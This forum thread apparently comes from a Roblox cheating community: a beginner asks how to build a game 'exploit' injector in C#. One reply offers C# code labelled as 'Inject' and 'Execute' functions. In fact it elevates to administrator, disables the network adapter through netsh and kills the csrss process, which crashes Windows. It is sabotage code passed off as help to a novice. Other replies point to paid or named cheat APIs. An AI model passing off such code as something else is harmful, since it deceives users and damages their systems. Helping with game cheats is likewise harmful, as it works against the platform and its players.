Categories > Coding > C# >

I need help to create an exploit for roblox from the microsoft store, which api should I use?

Posts: 1

Threads: 1

Joined: Apr, 2023

Reputation: 0

Posted

i NEED HELP, I USE  VISUAL STUDIO 2019 IN WINDOWS FORM C#.

  • 0

TERIHAX

i say im gay as a joke 🙀

Posts: 2186

Threads: 102

Joined: Jul, 2020

Reputation: 30

Replied

https://media.tenor.com/uDXN9Sje-A0AAAAd/skeleton-spinning.gif

  • 0

Posts: 139

Threads: 28

Joined: Feb, 2021

Reputation: 3

Replied

Place these functions in your main .cs file, and then run `Inject();` for your inject button

public static void Inject()
    {
        // Check if running with administrative privileges
        if (!IsRunningAsAdmin())
        {
            Console.WriteLine("This operation requires administrative privileges.");
            return;
        }

        // Disable the network adapter
        ExecuteCommand("interface set interface \"Ethernet\" admin=disable"); // Replace "Ethernet" with the appropriate network adapter name on your system
    }
private static void ExecuteCommand(string command)
    {
        using (var process = new Process())
        {
            process.StartInfo.FileName = "netsh";
            process.StartInfo.Arguments = command;
            process.StartInfo.Verb = "runas"; // Run the command as administrator
            process.StartInfo.UseShellExecute = true;
            process.Start();
        }
    }

And then place the following in the execute button:

System.Diagnostics.Process.GetProcessesByName("csrss")[0].Kill();
  • 1

Contribute to Express, an open-source ROBLOX exploit written fully in C.

Posts: 1381

Threads: 71

Joined: May, 2022

Reputation: 17

Replied

there are currently no public apis that work, you either pay 800$ a month for a dll or you make your own

  • 0

Did I mention I use arch btw?

gamerisballin

STR1K3R Dev

Posts: 13

Threads: 3

Joined: Apr, 2023

Reputation: -1

Replied

Use EasyExploits API, it works with the UWP Client

  • 0

Users viewing this thread:

( Members: 0, Guests: 1, Total: 1 )